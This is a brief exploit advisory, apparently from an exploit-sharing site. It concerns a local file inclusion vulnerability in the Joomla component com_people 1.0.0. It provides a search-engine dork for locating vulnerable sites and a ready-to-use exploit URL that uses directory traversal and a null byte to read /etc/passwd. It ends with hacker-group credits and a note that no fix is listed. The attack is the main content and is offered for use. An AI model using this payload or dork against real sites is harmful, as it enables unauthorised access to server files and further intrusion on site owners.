People Joomla Component 1.0.0 Local File Inclusion Vulnerability

2011-01-16 10:15:41

####################################################################
>>>>> Author : altbta [[email protected]]
>>>>> Home : [xp10.com]
>>>>> Script : Joomla Component com_people
>>>>> Bug Type : Local File Inclusion Vulnerability
>>>>> Dork : inurl:"/index.php?option=com_people"
>>>>> Vendor : http://www.ptt-solution.com
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_people&controller=../../../../../../../../../../../../../../../../../../etc/passwd%00


####################################################################
RxH & ab0-3th4b & MeTo & R3d-D3v!L &*
DR_ALWALEED<http://www.xp10.com/xp10/members/178149-DR_ALWALEED>
*

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.